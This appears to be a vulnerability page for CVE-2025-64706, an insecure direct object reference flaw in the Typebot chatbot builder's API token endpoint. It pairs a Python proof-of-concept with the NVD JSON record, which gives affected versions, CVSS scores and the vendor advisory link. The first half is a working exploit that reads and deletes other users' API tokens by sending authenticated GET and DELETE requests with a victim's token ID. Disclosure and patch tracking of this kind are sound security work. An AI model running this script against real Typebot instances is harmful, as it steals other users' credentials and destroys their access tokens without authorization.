CVE-2025-64706

import requests import json # CVE-2025-64706 PoC - Typebot IDOR Vulnerability # Target: Typebot API Token Management Endpoint TARGET_URL = "http://target-typebot-instance.com" ATTACKER_TOKEN = "attacker_auth_token_here" TARGET_USER_ID = "victim_user_id_here" TARGET_TOKEN_ID = "victim_api_token_id_here" def delete_user_api_token(): """Delete any user's API token without authorization""" endpoint = f"{TARGET_URL}/api/api-tokens/{TARGET_TOKEN_ID}" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # IDOR: No check if attacker owns this token response = requests.delete(endpoint, headers=headers) if response.status_code == 200: print("[+] Successfully deleted victim's API token") else: print(f"[-] Failed: {response.status_code}") def read_user_api_token(): """Read any user's API token value without authorization""" endpoint = f"{TARGET_URL}/api/api-tokens/{TARGET_TOKEN_ID}" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # IDOR: No ownership verification response = requests.get(endpoint, headers=headers) if response.status_code == 200: data = response.json() token_value = data.get("token", "") print(f"[+] Retrieved API Token: {token_value}") return token_value else: print(f"[-] Failed: {response.status_code}") return None if __name__ == "__main__": print("CVE-2025-64706 PoC - Typebot IDOR") print("=" * 50) read_user_api_token() delete_user_api_token()

{"cve": {"id": "CVE-2025-64706", "sourceIdentifier": "[email protected]", "published": "2025-11-13T18:15:56.310", "lastModified": "2026-01-30T14:14:33.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typebot is an open-source chatbot builder. In version 3.9.0 up to but excluding version 3.13.0, an Insecure Direct Object Reference (IDOR) vulnerability exists in the API token management endpoint. An authenticated attacker can delete any user's API token and retrieve its value by simply knowing the target user's ID and token ID, without requiring authorization checks. Version 3.13.0 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*", "versionStartIncluding": "3.9.0", "versionEndExcluding": "3.13.0", "matchCriteriaId": "FDE5EE9A-E1D5-4915-84D5-B4933DAEB0DF"}]}]}], "references": [{"url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-grx8-g27p-8hpp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}